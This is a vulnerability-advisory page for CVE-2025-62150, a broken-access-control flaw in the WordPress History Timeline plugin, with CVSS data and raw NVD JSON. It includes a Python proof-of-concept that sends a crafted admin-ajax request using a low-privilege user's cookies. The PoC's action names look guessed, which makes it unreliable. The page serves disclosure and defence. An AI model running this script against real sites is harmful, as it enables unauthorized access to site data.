Security Vulnerability Report
中文
CVE-2025-62150 CVSS 4.3 MEDIUM

CVE-2025-62150

Published: 2025-12-31 16:15:47
Last Modified: 2026-04-23 15:34:38

Description

Missing Authorization vulnerability in themesawesome History Timeline timeline-awesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects History Timeline: from n/a through <= 1.0.6.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

timeline-awesome <= 1.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62150 PoC - WordPress Timeline Awesome Broken Access Control # This PoC demonstrates the missing authorization vulnerability in timeline-awesome plugin TARGET_URL = "http://target-wordpress-site.com" COOKIES = { 'wordpress_test_cookie': 'WP Cookie check', # Add authenticated user's cookies here 'wordpress_logged_in_cookie': 'YOUR_LOGGED_IN_COOKIE' } def exploit_unauthorized_access(): """ Exploit the missing authorization vulnerability The plugin fails to properly validate user capabilities before performing admin actions """ # Endpoint that should require admin privileges but doesn't vulnerable_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-admin/admin.php?page=timeline-awesome-settings" ] # PoC: Low-privilege user can access admin functions payload = { 'action': 'timeline_awesome_admin_action', 'sub_action': 'export_timeline_data', 'nonce': 'attacker_provided_or_missing_nonce' } print("[*] Testing CVE-2025-62150 - Missing Authorization in timeline-awesome") print(f"[*] Target: {TARGET_URL}") for endpoint in vulnerable_endpoints: try: response = requests.post( endpoint, data=payload, cookies=COOKIES, timeout=10 ) # Check if low-privilege access was successful if response.status_code == 200: if 'timeline' in response.text.lower() or 'success' in response.text.lower(): print(f"[!] VULNERABLE: Admin function accessible with low privileges") print(f"[!] Endpoint: {endpoint}") print(f"[!] Response preview: {response.text[:200]}") return True except Exception as e: print(f"[-] Error: {e}") print("[*] PoC execution completed") return False if __name__ == "__main__": exploit_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62150", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:46.513", "lastModified": "2026-04-23T15:34:38.107", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themesawesome History Timeline timeline-awesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects History Timeline: from n/a through <= 1.0.6."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Themesawesome History Timeline permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a History Timeline: desde n/a hasta 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/timeline-awesome/vulnerability/wordpress-history-timeline-plugin-1-0-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}